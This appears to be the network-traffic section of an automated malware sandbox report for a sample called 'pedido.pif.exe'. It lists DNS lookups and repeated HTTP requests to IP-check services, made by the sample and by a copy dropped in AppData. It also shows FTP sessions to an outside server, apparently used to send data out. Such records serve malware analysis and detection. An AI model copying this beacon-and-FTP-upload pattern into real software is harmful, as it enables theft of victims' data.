Oct 31, 2024 10:37:47.361291885 CET	55435	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:47.484729052 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.484982014 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:47.489805937 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.630646944 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.632482052 CET	55437	33160	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:47.637459993 CET	33160	55437	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.637638092 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:47.637722015 CET	55437	33160	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:47.642858982 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:47.928617001 CET	443	55436	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:47.930788994 CET	55436	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:47.930809975 CET	443	55436	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:48.067226887 CET	443	55436	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:48.067337036 CET	443	55436	188.114.96.3	192.168.2.8
Oct 31, 2024 10:37:48.068684101 CET	55436	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:48.068684101 CET	55436	443	192.168.2.8	188.114.96.3
Oct 31, 2024 10:37:48.156244040 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:48.156625032 CET	55437	33160	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:48.156625032 CET	55437	33160	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:48.161571980 CET	33160	55437	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:48.162020922 CET	33160	55437	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:48.162142038 CET	55437	33160	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:48.204977989 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:48.301469088 CET	21	55434	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:48.345593929 CET	55434	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:53.276027918 CET	55435	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:53.277972937 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:53.281575918 CET	80	55435	193.122.130.0	192.168.2.8
Oct 31, 2024 10:37:53.281631947 CET	55435	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:37:53.282977104 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:53.283068895 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:53.799202919 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:53.801963091 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:53.806925058 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:53.959276915 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:53.961894035 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:53.967015028 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.139349937 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.139592886 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:54.145025969 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.286748886 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.286935091 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:54.291923046 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.432212114 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.432446957 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:54.437685966 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.576706886 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.576853037 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:54.582072973 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.721275091 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.721956968 CET	55439	33047	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:54.726887941 CET	33047	55439	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:54.726978064 CET	55439	33047	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:54.727039099 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:54.732409954 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:55.253367901 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:55.253621101 CET	55439	33047	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:55.253659964 CET	55439	33047	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:55.258780956 CET	33047	55439	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:55.259743929 CET	33047	55439	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:55.259793997 CET	55439	33047	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:55.298767090 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:37:55.400563955 CET	21	55438	50.31.176.103	192.168.2.8
Oct 31, 2024 10:37:55.455051899 CET	55438	21	192.168.2.8	50.31.176.103
Oct 31, 2024 10:38:37.688904047 CET	80	49713	193.122.130.0	192.168.2.8
Oct 31, 2024 10:38:37.692111969 CET	49713	80	192.168.2.8	193.122.130.0
Oct 31, 2024 10:38:44.381242037 CET	80	49726	193.122.130.0	192.168.2.8
Oct 31, 2024 10:38:44.381299973 CET	49726	80	192.168.2.8	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 10:37:28.782161951 CET	63259	53	192.168.2.8	1.1.1.1
Oct 31, 2024 10:37:28.790148020 CET	53	63259	1.1.1.1	192.168.2.8
Oct 31, 2024 10:37:30.080730915 CET	51118	53	192.168.2.8	1.1.1.1
Oct 31, 2024 10:37:30.090171099 CET	53	51118	1.1.1.1	192.168.2.8
Oct 31, 2024 10:37:44.274240017 CET	53	65450	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 10:37:28.782161951 CET	192.168.2.8	1.1.1.1	0x6d8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:37:30.080730915 CET	192.168.2.8	1.1.1.1	0xd666	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 10:37:28.790148020 CET	1.1.1.1	192.168.2.8	0x6d8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 10:37:28.790148020 CET	1.1.1.1	192.168.2.8	0x6d8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:37:28.790148020 CET	1.1.1.1	192.168.2.8	0x6d8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:37:28.790148020 CET	1.1.1.1	192.168.2.8	0x6d8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:37:28.790148020 CET	1.1.1.1	192.168.2.8	0x6d8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:37:28.790148020 CET	1.1.1.1	192.168.2.8	0x6d8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:37:30.090171099 CET	1.1.1.1	192.168.2.8	0xd666	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 31, 2024 10:37:30.090171099 CET	1.1.1.1	192.168.2.8	0xd666	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	193.122.130.0	80	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:28.810409069 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:29.825524092 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a992e01f1a57aa7a10fa4187233ded6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:37:29.830672979 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:37:30.018132925 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e660efb70ca9316c050f3177fbd887f4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:37:30.993073940 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:37:31.220458984 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:31 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3c0ca9f75a53c12146ee3037e9f3ecdd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49713	193.122.130.0	80	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:31.982398987 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:37:32.663136005 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 708cb3ec9e0247c43c0c91e28563b25d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	193.122.130.0	80	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:33.420371056 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:34.087682962 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 185101312edfff1078a58f7beb3af92e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49717	193.122.130.0	80	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:34.850861073 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:35.514245987 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:35 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c28843bb9ecfbf8c00d1644c31b89f42 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49719	193.122.130.0	80	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:35.842900991 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:36.533608913 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9c25e4e7559b6b83446a1da0711f1241 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:37:36.537703037 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:37:36.700730085 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 358f506687b73026056ca807348ec9c9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Oct 31, 2024 10:37:37.754631996 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:37:37.920953989 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:37 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c13209a9e9fdfa225fc3522eb79ee6bd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49720	193.122.130.0	80	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:36.353669882 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:37.006655931 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:36 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 20cac09656cbf4aba965ee6f46be80de Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49723	193.122.130.0	80	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:37.760721922 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:38.449312925 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:38 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8e139094916ef48e32d9cf59b66b7173 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49726	193.122.130.0	80	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:38.694971085 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 31, 2024 10:37:39.348088026 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:39 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f98c537f26f321d76da29c765d231c6f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49727	193.122.130.0	80	5188	C:\Users\user\Desktop\pedido.pif.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:39.223305941 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:39.894350052 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:39 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 51186c4d01d4028b4feeaeccb0ae237d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49732	193.122.130.0	80	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:40.114207029 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:40.768721104 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:40 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 82aa5dff9be0abc3d7418c6c65d52679 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49735	193.122.130.0	80	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:41.689124107 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:42.369683981 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:42 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4c641aa7028f462adb54dd23f338e472 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49738	193.122.130.0	80	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:43.464862108 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 31, 2024 10:37:44.125128984 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:37:44 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 078fd50fb1c53a7489dd37f52cd4ae53 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	55432	193.122.130.0	80	5040	C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:37:44.902343988 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
